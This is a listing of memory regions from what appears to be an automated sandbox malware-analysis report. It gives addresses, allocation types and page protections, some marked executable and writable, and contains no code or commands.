remote allocation
page execute and read and write
8600000
heap
page read and write
2220F000
stack
page read and write
3160000
heap
page read and write
7A70000
trusted library allocation
page read and write
4931000
heap
page read and write
56A4000
unclassified section
page read and write
1B0000
unkown
page readonly
1B66CF3A000
heap
page read and write
55E0000
heap
page read and write
4C78000
trusted library allocation
page read and write
84CD000
stack
page read and write
1B66CEB0000
heap
page read and write
7ED2000
heap
page read and write
7F8C000
heap
page read and write
85F4000
heap
page read and write
1B66CC0D000
heap
page read and write
83CC000
stack
page read and write
4931000
heap
page read and write
7F03000
heap
page read and write
4931000
heap
page read and write
281BDD9F000
heap
page read and write
1298000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
85CF000
stack
page read and write
880F000
stack
page read and write
1BE000
unkown
page readonly
1B66CC20000
heap
page read and write
1B66CDB5000
heap
page read and write
5737000
unkown
page execute and read and write
11A6000
system
page execute and read and write
6A4B000
heap
page read and write
70F0000
trusted library allocation
page execute and read and write
1B66CD87000
heap
page read and write
1CB00082000
trusted library allocation
page read and write
840000
heap
page read and write
2EE4000
heap
page read and write
1B66CD62000
heap
page read and write
311E000
stack
page read and write
1B66CC77000
heap
page read and write
1031000
unkown
page readonly
72D5000
heap
page execute and read and write
73F0000
direct allocation
page read and write
2BC0000
heap
page read and write
4931000
heap
page read and write
1B66CD8B000
heap
page read and write
7900000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB0203D000
trusted library allocation
page read and write
890000
heap
page read and write
7CD9A7E000
stack
page read and write
37D0000
unkown
page execute and read and write
752E000
stack
page read and write
73C0000
direct allocation
page read and write
6A39000
heap
page read and write
8D00000
direct allocation
page read and write
8CF0000
direct allocation
page read and write
1B66CDEB000
heap
page read and write
4D1E000
stack
page read and write
7EDF000
heap
page read and write
7F45000
heap
page read and write
1B1000
unkown
page execute read
7811000
heap
page read and write
1B66CC66000
heap
page read and write
1B66AF8E000
heap
page read and write
4931000
heap
page read and write
1B66B119000
heap
page read and write
1647F7E000
stack
page read and write
4931000
heap
page read and write
5E17000
trusted library allocation
page read and write
1B66CC7F000
heap
page read and write
1BEB3FF000
stack
page read and write
4931000
heap
page read and write
1B66D177000
heap
page read and write
1B66CD80000
heap
page read and write
1B66CDBB000
heap
page read and write
79E7000
heap
page read and write
4931000
heap
page read and write
1B66CD58000
heap
page read and write
30F8000
heap
page read and write
2208E000
stack
page read and write
1B66CC83000
heap
page read and write
1B66D0D0000
remote allocation
page read and write
281BDD7A000
heap
page read and write
1CB014DF000
trusted library allocation
page read and write
71DE000
stack
page read and write
4931000
heap
page read and write
22371000
heap
page read and write
281BF7E0000
heap
page read and write
4931000
heap
page read and write
1B66AF08000
heap
page read and write
1CB711C0000
heap
page execute and read and write
4931000
heap
page read and write
1B66CF21000
heap
page read and write
4931000
heap
page read and write
7F1F000
heap
page read and write
4931000
heap
page read and write
73E0000
direct allocation
page read and write
4931000
heap
page read and write
1BEB7FF000
stack
page read and write
4931000
heap
page read and write
1B66AF4F000
heap
page read and write
BD0000
unkown
page readonly
7FF848EBC000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1B66CC22000
heap
page read and write
B1519FE000
stack
page read and write
7FF848FB1000
trusted library allocation
page read and write
1B66CF66000
heap
page read and write
8870000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1CB10001000
trusted library allocation
page read and write
12F134B0000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
2C46000
heap
page read and write
4931000
heap
page read and write
1B66CD8B000
heap
page read and write
87C0000
trusted library allocation
page execute and read and write
1CB71676000
heap
page execute and read and write
F00000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7C9000
stack
page read and write
2FFE000
stack
page read and write
4931000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
77EE000
stack
page read and write
1B66CC2A000
heap
page read and write
2E5E000
stack
page read and write
6A54000
heap
page read and write
2C51000
heap
page read and write
772E000
stack
page read and write
21C60000
direct allocation
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
6A4B000
heap
page read and write
6A5A000
heap
page read and write
6B64000
heap
page read and write
23420000
unclassified section
page execute and read and write
1B66AE60000
heap
page read and write
7FA0000
heap
page read and write
2CA8000
stack
page read and write
4DB1000
trusted library allocation
page read and write
7C1E000
stack
page read and write
1B66CD5F000
heap
page read and write
4931000
heap
page read and write
6A4B000
heap
page read and write
1B66CEE1000
heap
page read and write
54DF000
stack
page read and write
4931000
heap
page read and write
1B66CCA8000
heap
page read and write
52BC000
unclassified section
page read and write
1B66CDEC000
heap
page read and write
281BF620000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB6F790000
heap
page readonly
3420000
trusted library section
page read and write
3A94000
remote allocation
page execute and read and write
4AE0000
trusted library allocation
page execute and read and write
6A6E000
heap
page read and write
6D10000
direct allocation
page read and write
4920000
heap
page read and write
281BDC20000
system
page execute and read and write
281BFA01000
trusted library allocation
page read and write
32EA000
heap
page read and write
4931000
heap
page read and write
844D000
stack
page read and write
1B66CC5E000
heap
page read and write
756A000
stack
page read and write
577F000
stack
page read and write
2B3F000
unkown
page read and write
4931000
heap
page read and write
10C0000
unkown
page read and write
1BEBAFB000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB102F9000
trusted library allocation
page read and write
2818A2C0000
heap
page read and write
4931000
heap
page read and write
2BB0000
heap
page read and write
1B66CEBD000
heap
page read and write
4C60000
heap
page readonly
7FF849080000
trusted library allocation
page read and write
807E000
stack
page read and write
1CB00943000
trusted library allocation
page read and write
6D40000
direct allocation
page read and write
1CB6F8F5000
heap
page read and write
6CBE000
stack
page read and write
489B000
stack
page read and write
75E0000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
8A64000
heap
page read and write
6D70000
heap
page read and write
4931000
heap
page read and write
721E000
stack
page read and write
4BD0000
unkown
page execute and read and write
5956000
remote allocation
page execute and read and write
1B66CCB3000
heap
page read and write
1B66CDBA000
heap
page read and write
1B66CC56000
heap
page read and write
1B0000
unkown
page readonly
281BDD30000
heap
page read and write
7967000
heap
page read and write
1B66CEB2000
heap
page read and write
1B66CDEF000
heap
page read and write
1CB6F6B3000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66CD7E000
heap
page read and write
7F65000
heap
page read and write
6C7E000
stack
page read and write
4931000
heap
page read and write
1031000
unkown
page readonly
1B66AF89000
heap
page read and write
2DC0000
heap
page read and write
69E8000
heap
page read and write
12F13090000
heap
page read and write
2210D000
stack
page read and write
4810000
heap
page read and write
D4D000
unkown
page read and write
1B66CD52000
heap
page read and write
4931000
heap
page read and write
69E0000
heap
page read and write
1CB10011000
trusted library allocation
page read and write
1B66CC1D000
heap
page read and write
1B66AF88000
heap
page read and write
1B66CC63000
heap
page read and write
1CB005A5000
trusted library allocation
page read and write
6B30000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CC1D000
heap
page read and write
10F0000
heap
page read and write
4C90000
direct allocation
page execute and read and write
12F14C10000
heap
page read and write
1B66CCBB000
heap
page read and write
1B66CF20000
heap
page read and write
1CB01389000
trusted library allocation
page read and write
1B66CC2E000
heap
page read and write
1B66CDBB000
heap
page read and write
3335000
heap
page read and write
7FF848E04000
trusted library allocation
page read and write
2DBF000
stack
page read and write
1B66CC0B000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7CD9DFF000
stack
page read and write
B9A000
stack
page read and write
6A54000
heap
page read and write
1B66AF88000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7CDAA4B000
stack
page read and write
1B66CF1C000
heap
page read and write
2264D000
heap
page read and write
1B66CFBD000
heap
page read and write
2C72000
heap
page read and write
4F8F000
stack
page read and write
2E9E000
stack
page read and write
1B66CDE2000
heap
page read and write
4931000
heap
page read and write
7FF848E03000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
4931000
heap
page read and write
22496000
heap
page read and write
227F9000
direct allocation
page execute and read and write
8A78000
heap
page read and write
2C6B000
stack
page read and write
4931000
heap
page read and write
1B1000
unkown
page execute read
4931000
heap
page read and write
22A20000
unclassified section
page execute and read and write
86B7000
stack
page read and write
1CB01E84000
trusted library allocation
page read and write
3020000
heap
page read and write
7CD96FE000
stack
page read and write
4C90000
heap
page execute and read and write
1CB71670000
heap
page execute and read and write
4931000
heap
page read and write
77AE000
stack
page read and write
329E000
stack
page read and write
4931000
heap
page read and write
2C53000
heap
page read and write
1B66B115000
heap
page read and write
719E000
stack
page read and write
1B66CD8D000
heap
page read and write
1CB009BB000
trusted library allocation
page read and write
1CB71622000
heap
page read and write
73D0000
direct allocation
page read and write
1B66CDEF000
heap
page read and write
B10000
unkown
page readonly
1B66CDF0000
heap
page read and write
C834000
direct allocation
page execute and read and write
4931000
heap
page read and write
5E9C000
system
page read and write
1B66CD87000
heap
page read and write
6A0D000
heap
page read and write
1B66CDEB000
heap
page read and write
1B66CCB2000
heap
page read and write
2BCC000
heap
page read and write
1B66CD46000
heap
page read and write
50FC000
unclassified section
page read and write
1B66CC5B000
heap
page read and write
6A55000
heap
page read and write
1647EFF000
stack
page read and write
1B66CC9B000
heap
page read and write
281BF903000
trusted library allocation
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
6A5B000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
335E000
stack
page read and write
281BF90E000
trusted library allocation
page read and write
B10000
unkown
page readonly
281BFAC4000
trusted library allocation
page read and write
4931000
heap
page read and write
4D5C000
stack
page read and write
1B66AF2D000
heap
page read and write
1B66AF52000
heap
page read and write
1B66CD87000
heap
page read and write
1B66CDEF000
heap
page read and write
1B66CD8D000
heap
page read and write
7FF848E02000
trusted library allocation
page read and write
7EE4000
heap
page read and write
2EC0000
heap
page read and write
1B66CDEF000
heap
page read and write
1B66CDA6000
heap
page read and write
22520000
heap
page read and write
1B66CDEB000
heap
page read and write
1B66CED1000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
1B66CD76000
heap
page read and write
7B00000
trusted library allocation
page read and write
1CB6F840000
trusted library allocation
page read and write
281BDC80000
system
page execute and read and write
549E000
stack
page read and write
1CB715B1000
heap
page read and write
7FAD000
heap
page read and write
330F000
stack
page read and write
4A30000
trusted library allocation
page read and write
7CD997E000
stack
page read and write
2DD0000
unkown
page execute and read and write
7CD987C000
stack
page read and write
1B66CF31000
heap
page read and write
4931000
heap
page read and write
7EED000
heap
page read and write
6B50000
heap
page readonly
6A0E000
heap
page read and write
48C0000
trusted library allocation
page read and write
3430000
trusted library allocation
page read and write
281BF921000
trusted library allocation
page read and write
1B66CD87000
heap
page read and write
4931000
heap
page read and write
899B000
stack
page read and write
1B66CDC7000
heap
page read and write
34D0000
heap
page read and write
1B66CDC7000
heap
page read and write
3525000
heap
page read and write
7D2B000
stack
page read and write
8860000
trusted library allocation
page execute and read and write
1B66CDBB000
heap
page read and write
6D00000
direct allocation
page read and write
D4A000
unkown
page read and write
3490000
heap
page read and write
1B66CDD8000
heap
page read and write
4931000
heap
page read and write
7907000
trusted library allocation
page read and write
1B66CD01000
heap
page read and write
4931000
heap
page read and write
21C40000
direct allocation
page read and write
1CB009B3000
trusted library allocation
page read and write
7FF848FE2000
trusted library allocation
page read and write
1B66CC3D000
heap
page read and write
2286E000
direct allocation
page execute and read and write
3042000
heap
page read and write
1CB6F8F0000
heap
page read and write
2EE4000
heap
page read and write
4DBD000
direct allocation
page execute and read and write
7CD99FE000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB02051000
trusted library allocation
page read and write
1CB6F5D0000
heap
page read and write
7100000
trusted library allocation
page read and write
760000
heap
page read and write
8D10000
direct allocation
page read and write
4931000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
2E70000
direct allocation
page read and write
1B66CDBB000
heap
page read and write
332C000
heap
page read and write
835000
heap
page read and write
2DBE000
stack
page read and write
4CDE000
stack
page read and write
1B66CC12000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
1CB01E80000
trusted library allocation
page read and write
5CDC000
system
page read and write
1CB02036000
trusted library allocation
page read and write
1B66CD0A000
heap
page read and write
1CB71710000
heap
page read and write
850E000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB71AC0000
heap
page read and write
4931000
heap
page read and write
7420000
direct allocation
page read and write
86F0000
trusted library allocation
page read and write
4FE2000
unclassified section
page read and write
4931000
heap
page read and write
226D0000
direct allocation
page execute and read and write
895C000
stack
page read and write
21C30000
direct allocation
page read and write
1B66CC20000
heap
page read and write
1B66CC6E000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
4931000
heap
page read and write
86C0000
heap
page read and write
7EE9000
heap
page read and write
12AE000
heap
page read and write
1B66CDFA000
heap
page read and write
5BC2000
system
page read and write
1B66AF82000
heap
page read and write
7AB0000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB71210000
heap
page execute and read and write
6A22000
heap
page read and write
2D40000
heap
page read and write
48C0000
trusted library allocation
page read and write
3DBB2000
system
page read and write
4931000
heap
page read and write
4F61000
direct allocation
page execute and read and write
1B66AF88000
heap
page read and write
729E000
stack
page read and write
1B66CC15000
heap
page read and write
281BF640000
trusted library allocation
page read and write
2818A33B000
heap
page read and write
EFC000
stack
page read and write
7CD967E000
stack
page read and write
1B66CDC7000
heap
page read and write
573E000
stack
page read and write
4C7F000
heap
page read and write
1B66CD7E000
heap
page read and write
1B66CDEF000
heap
page read and write
8C8E000
stack
page read and write
229A1000
direct allocation
page execute and read and write
12AF000
unkown
page read and write
128E000
stack
page read and write
8A4B000
heap
page read and write
4931000
heap
page read and write
2F70000
trusted library allocation
page read and write
4931000
heap
page read and write
6A49000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4FD2000
direct allocation
page execute and read and write
1B66CC8B000
heap
page read and write
605B000
trusted library allocation
page read and write
281BDD9B000
heap
page read and write
72D0000
heap
page execute and read and write
10A0000
unkown
page readonly
7B5D000
stack
page read and write
5C82000
system
page read and write
79FE000
heap
page read and write
9634000
direct allocation
page execute and read and write
4931000
heap
page read and write
6A49000
heap
page read and write
2EA0000
heap
page read and write
22649000
heap
page read and write
7CDA84E000
stack
page read and write
281BF912000
trusted library allocation
page read and write
1B66CDC7000
heap
page read and write
1B66AF6F000
heap
page read and write
85E7000
heap
page read and write
7AE0000
heap
page execute and read and write
7FF849170000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
1BEAD69000
stack
page read and write
50D000
stack
page read and write
1CB01E20000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CD88000
heap
page read and write
4931000
heap
page read and write
220CE000
stack
page read and write
6284000
system
page read and write
1B66CC1A000
heap
page read and write
1B66CCB8000
heap
page read and write
1B66CD5A000
heap
page read and write
22371000
heap
page read and write
3DC72000
system
page read and write
33EE000
stack
page read and write
1B66AE90000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66B11A000
heap
page read and write
4931000
heap
page read and write
1B66CC1F000
heap
page read and write
B30000
unkown
page readonly
303C000
stack
page read and write
7CD9E7C000
stack
page read and write
1CB01CA3000
trusted library allocation
page read and write
1B66CEC0000
heap
page read and write
7FE4000
heap
page read and write
1B66CDE4000
heap
page read and write
2DC0000
heap
page read and write
4931000
heap
page read and write
5DC1000
trusted library allocation
page read and write
33F0000
heap
page read and write
85FD000
heap
page read and write
2A3E000
unkown
page read and write
4931000
heap
page read and write
7A30000
trusted library allocation
page read and write
7F0B000
heap
page read and write
281BF800000
trusted library allocation
page read and write
1B66AF18000
heap
page read and write
4930000
heap
page read and write
7C5D000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
1B66CDCA000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
48C0000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
1B66CEC0000
heap
page read and write
2EE4000
heap
page read and write
6A50000
heap
page read and write
1CB6F624000
heap
page read and write
335B000
heap
page read and write
4931000
heap
page read and write
8CCE000
stack
page read and write
7A40000
trusted library allocation
page read and write
1CB6F71A000
heap
page read and write
4931000
heap
page read and write
1390000
unkown
page readonly
307D000
stack
page read and write
4931000
heap
page read and write
7F4A000
heap
page read and write
1B66CC0E000
heap
page read and write
1B66CDC7000
heap
page read and write
1CB6F4D0000
heap
page read and write
2F6F000
stack
page read and write
2EE0000
heap
page read and write
1CB71563000
heap
page read and write
493B000
heap
page read and write
7400000
direct allocation
page read and write
50A2000
unclassified section
page read and write
3472000
trusted library allocation
page read and write
3037000
heap
page read and write
2EE4000
heap
page read and write
1B66CDFE000
heap
page read and write
1B66CEB8000
heap
page read and write
4931000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1B66CD8D000
heap
page read and write
500C000
stack
page read and write
1CB6F810000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
1B66CD87000
heap
page read and write
7932000
heap
page read and write
4931000
heap
page read and write
79F4000
heap
page read and write
2818A430000
heap
page read and write
2C49000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1BEB4FF000
stack
page read and write
1CB02145000
trusted library allocation
page read and write
124C000
stack
page read and write
B9A000
stack
page read and write
3310000
heap
page read and write
4931000
heap
page read and write
8A80000
heap
page read and write
22A12000
direct allocation
page execute and read and write
1B66CD87000
heap
page read and write
1B66CC35000
heap
page read and write
1B66AF7D000
heap
page read and write
877E000
stack
page read and write
2EE4000
heap
page read and write
7CDA94D000
stack
page read and write
74AA000
stack
page read and write
4931000
heap
page read and write
1B66CD8D000
heap
page read and write
32DE000
heap
page read and write
1B66CD5B000
heap
page read and write
4931000
heap
page read and write
7F7C000
heap
page read and write
1B66CC2D000
heap
page read and write
495E000
stack
page read and write
1B66CDD5000
heap
page read and write
3180000
heap
page read and write
AA34000
direct allocation
page execute and read and write
1B66CEC0000
heap
page read and write
4931000
heap
page read and write
2DC4000
heap
page read and write
281BDD7F000
heap
page read and write
4931000
heap
page read and write
1721000
unkown
page readonly
1B66CD54000
heap
page read and write
2236C000
stack
page read and write
8820000
trusted library allocation
page read and write
1B66AF4F000
heap
page read and write
8D30000
direct allocation
page read and write
2F0B000
stack
page read and write
B20000
unkown
page readonly
7CD0000
trusted library allocation
page read and write
4931000
heap
page read and write
4E10000
trusted library allocation
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
349A000
heap
page read and write
1B66CD48000
heap
page read and write
10C0000
unkown
page read and write
1B66CD91000
heap
page read and write
1B66CF67000
heap
page read and write
1B66CCA3000
heap
page read and write
1B66CDD5000
heap
page read and write
1CB71631000
heap
page read and write
4931000
heap
page read and write
1B66CC02000
heap
page read and write
1B66CC4B000
heap
page read and write
6A22000
heap
page read and write
4931000
heap
page read and write
1B66AF59000
heap
page read and write
2B30000
unkown
page readonly
1B66CDE8000
heap
page read and write
1B66AEBD000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66AEB9000
heap
page read and write
1CB01C2C000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
1B66CF35000
heap
page read and write
1CB6F630000
heap
page read and write
1C5000
unkown
page read and write
736D000
stack
page read and write
3078000
stack
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
7FF848E5C000
trusted library allocation
page execute and read and write
3028000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
6D60000
direct allocation
page read and write
7A60000
trusted library allocation
page read and write
4931000
heap
page read and write
3B56000
remote allocation
page execute and read and write
4931000
heap
page read and write
1CB718B0000
heap
page read and write
7AF0000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB6F660000
trusted library allocation
page read and write
8A20000
heap
page read and write
1B66CDBB000
heap
page read and write
1CB6F75B000
heap
page read and write
60D000
stack
page read and write
1B66CC15000
heap
page read and write
1B66CF9B000
heap
page read and write
6A49000
heap
page read and write
281BDDA2000
heap
page read and write
1B66CD53000
heap
page read and write
7942000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CDAE000
heap
page read and write
227FD000
direct allocation
page execute and read and write
8080000
trusted library allocation
page read and write
4F56000
remote allocation
page execute and read and write
F768AFF000
stack
page read and write
1B66CD8B000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CF35000
heap
page read and write
1B66CCA0000
heap
page read and write
6B60000
heap
page read and write
1B66CDBC000
heap
page read and write
4931000
heap
page read and write
1B66D0D0000
remote allocation
page read and write
1BEB5FB000
stack
page read and write
4931000
heap
page read and write
7CD977E000
stack
page read and write
2E30000
direct allocation
page read and write
1B66CD0A000
heap
page read and write
344D000
trusted library allocation
page execute and read and write
2232B000
stack
page read and write
7C70000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CC46000
heap
page read and write
1B66CDD8000
heap
page read and write
1B66CEF2000
heap
page read and write
1BEB0FE000
stack
page read and write
5BD3000
system
page read and write
1B66CDAB000
heap
page read and write
25319000
unclassified section
page execute and read and write
4931000
heap
page read and write
1CB6F690000
heap
page read and write
4931000
heap
page read and write
6A42000
heap
page read and write
7984000
heap
page read and write
1CB718BF000
heap
page read and write
4931000
heap
page read and write
3459000
trusted library allocation
page read and write
1BEB6FC000
stack
page read and write
1B66CC5B000
heap
page read and write
1B66AEBE000
heap
page read and write
7F3D000
heap
page read and write
1B66CEBA000
heap
page read and write
1B66CD8D000
heap
page read and write
4931000
heap
page read and write
85F0000
heap
page read and write
4931000
heap
page read and write
1B66CF93000
heap
page read and write
4931000
heap
page read and write
890F000
stack
page read and write
4931000
heap
page read and write
4C7C000
stack
page read and write
B1509FE000
stack
page read and write
8A6C000
heap
page read and write
1721000
unkown
page readonly
4931000
heap
page read and write
4FF3000
unclassified section
page read and write
48D9000
stack
page read and write
23E20000
unclassified section
page execute and read and write
4931000
heap
page read and write
1B66CF95000
heap
page read and write
1CB1000F000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
2214B000
stack
page read and write
7CD98FF000
stack
page read and write
1B66B110000
heap
page read and write
353A000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB715CA000
heap
page read and write
12F13070000
heap
page read and write
4BCD000
stack
page read and write
1B66B0A0000
heap
page read and write
4F04000
trusted library allocation
page read and write
33A0000
heap
page read and write
2818A330000
heap
page read and write
32B0000
heap
page read and write
3187000
heap
page read and write
B20000
unkown
page readonly
221CE000
stack
page read and write
7AD0000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CC29000
heap
page read and write
1B66CC93000
heap
page read and write
1B66CDF1000
heap
page read and write
12CE000
unkown
page read and write
3450000
trusted library allocation
page read and write
6D20000
direct allocation
page read and write
1B66CC12000
heap
page read and write
7FF849180000
trusted library allocation
page read and write
1CB718C9000
heap
page read and write
7EFE000
heap
page read and write
1B66CFB1000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
4556000
remote allocation
page execute and read and write
2818A530000
heap
page read and write
7C60000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
75F9000
heap
page read and write
2204F000
stack
page read and write
1B66D0D0000
remote allocation
page read and write
4931000
heap
page read and write
1CB01AB5000
trusted library allocation
page read and write
55C8000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB71816000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7A47000
trusted library allocation
page read and write
B434000
direct allocation
page execute and read and write
7910000
heap
page read and write
1040000
unkown
page read and write
1B66CD91000
heap
page read and write
1CB006F9000
trusted library allocation
page read and write
7FBB000
heap
page read and write
1B66CC42000
heap
page read and write
535E000
stack
page read and write
1B66CDF7000
heap
page read and write
1B66CD8F000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
86D0000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1B66CDC7000
heap
page read and write
1B66CEC0000
heap
page read and write
4931000
heap
page read and write
101E000
unkown
page read and write
2C20000
heap
page read and write
4931000
heap
page read and write
10A0000
unkown
page readonly
4931000
heap
page read and write
BF0000
unkown
page readonly
281BFACE000
trusted library allocation
page read and write
1B66CDD3000
heap
page read and write
545E000
stack
page read and write
7DF496C00000
trusted library allocation
page execute and read and write
281BF640000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
2DC4000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
3444000
trusted library allocation
page read and write
1B66B118000
heap
page read and write
1B66CDCE000
heap
page read and write
3037000
heap
page read and write
4C0E000
stack
page read and write
7F51000
heap
page read and write
1B66AF4F000
heap
page read and write
4931000
heap
page read and write
30D0000
heap
page read and write
2DC0000
heap
page read and write
1B66B11E000
heap
page read and write
1B66CDBB000
heap
page read and write
87D0000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
6CFF000
stack
page read and write
1B66CDD8000
heap
page read and write
1CB6F800000
heap
page read and write
7BDE000
stack
page read and write
2B7E000
stack
page read and write
1B66CC53000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
11A8000
system
page execute and read and write
4931000
heap
page read and write
2225E000
stack
page read and write
1B66CDC7000
heap
page read and write
1B66CD91000
heap
page read and write
4931000
heap
page read and write
491C000
stack
page read and write
1CB717F0000
heap
page read and write
4FCC000
stack
page read and write
830000
heap
page read and write
1B66AF65000
heap
page read and write
79F9000
heap
page read and write
4931000
heap
page read and write
1B66CD7E000
heap
page read and write
4931000
heap
page read and write
4AE1000
heap
page read and write
1B66CC4E000
heap
page read and write
6A10000
heap
page read and write
539E000
stack
page read and write
7FF849150000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CDBB000
heap
page read and write
1BEB8FF000
stack
page read and write
3105000
heap
page read and write
1CB6F6DD000
heap
page read and write
1CB10309000
trusted library allocation
page read and write
1B66CC46000
heap
page read and write
4931000
heap
page read and write
1B66CF30000
heap
page read and write
1B66CD91000
heap
page read and write
6A55000
heap
page read and write
4931000
heap
page read and write
339E000
stack
page read and write
F7688FD000
stack
page read and write
1B66AE99000
heap
page read and write
7AC0000
trusted library allocation
page execute and read and write
1B66CC90000
heap
page read and write
F7689FF000
unkown
page read and write
1B66CD32000
heap
page read and write
7F29000
heap
page read and write
7CD97FE000
stack
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
BE0000
unkown
page readonly
1B66CD48000
heap
page read and write
49E0000
heap
page read and write
281BF900000
trusted library allocation
page read and write
3101000
heap
page read and write
85ED000
heap
page read and write
1B66CDB6000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
5DB1000
trusted library allocation
page read and write
746E000
stack
page read and write
2EE4000
heap
page read and write
1CB71560000
heap
page read and write
4931000
heap
page read and write
22370000
heap
page read and write
2818A534000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
89DE000
stack
page read and write
5DD9000
trusted library allocation
page read and write
BE34000
direct allocation
page execute and read and write
7CD9AFE000
stack
page read and write
1390000
unkown
page readonly
56C9000
unkown
page execute and read and write
25387000
unclassified section
page execute and read and write
7CD93EE000
stack
page read and write
8700000
heap
page read and write
4931000
heap
page read and write
1B66CD8D000
heap
page read and write
6A6E000
heap
page read and write
3475000
trusted library allocation
page execute and read and write
1B66D101000
heap
page read and write
73B0000
direct allocation
page read and write
4931000
heap
page read and write
2C00000
heap
page read and write
8D50000
direct allocation
page read and write
281BFAAA000
trusted library allocation
page read and write
1B66CDEB000
heap
page read and write
3E274000
system
page read and write
4931000
heap
page read and write
F00000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CC7A000
heap
page read and write
1B66CC88000
heap
page read and write
4931000
heap
page read and write
1B66CED1000
heap
page read and write
1B66CF1C000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1180000
system
page execute and read and write
4DAE000
stack
page read and write
4931000
heap
page read and write
3DE8C000
system
page read and write
1B66CC3A000
heap
page read and write
4C50000
heap
page read and write
1B66AF7A000
heap
page read and write
4931000
heap
page read and write
4F30000
heap
page read and write
7CDA9CB000
stack
page read and write
1B66CD87000
heap
page read and write
85FA000
heap
page read and write
73AB000
stack
page read and write
41D0000
unkown
page execute and read and write
281BDD8C000
heap
page read and write
7A04000
heap
page read and write
1B66AEB8000
heap
page read and write
680000
heap
page read and write
6D50000
direct allocation
page read and write
1CB7185E000
heap
page read and write
1B66CDC7000
heap
page read and write
1C7000
unkown
page readonly
88D000
stack
page read and write
1B66CDBA000
heap
page read and write
4931000
heap
page read and write
2F2E000
stack
page read and write
1B66CF10000
heap
page read and write
85E0000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
4850000
heap
page read and write
1B66B11C000
heap
page read and write
7FF848EE6000
trusted library allocation
page execute and read and write
848D000
stack
page read and write
7CB0000
trusted library allocation
page read and write
1B66CEB9000
heap
page read and write
1B66CC32000
heap
page read and write
7FF848E1B000
trusted library allocation
page read and write
34E8000
heap
page read and write
2E70000
direct allocation
page read and write
776F000
stack
page read and write
B1501FB000
stack
page read and write
1B66CDD3000
heap
page read and write
1B66CC82000
heap
page read and write
281BDD70000
heap
page read and write
1B66CDE2000
heap
page read and write
4931000
heap
page read and write
226BE000
heap
page read and write
1B66CD67000
heap
page read and write
8AC0000
heap
page read and write
2200E000
stack
page read and write
1060000
unkown
page read and write
EFC000
stack
page read and write
1B66CF67000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
1BE000
unkown
page readonly
3443000
trusted library allocation
page execute and read and write
2D6E000
stack
page read and write
4931000
heap
page read and write
1B66AD60000
heap
page read and write
BE0000
unkown
page readonly
1CB00517000
trusted library allocation
page read and write
79EA000
heap
page read and write
4931000
heap
page read and write
1B66CDC7000
heap
page read and write
3315000
heap
page read and write
21C70000
direct allocation
page read and write
4A5E000
heap
page read and write
2D2F000
unkown
page read and write
There are 1271 hidden memdumps, click here to show them.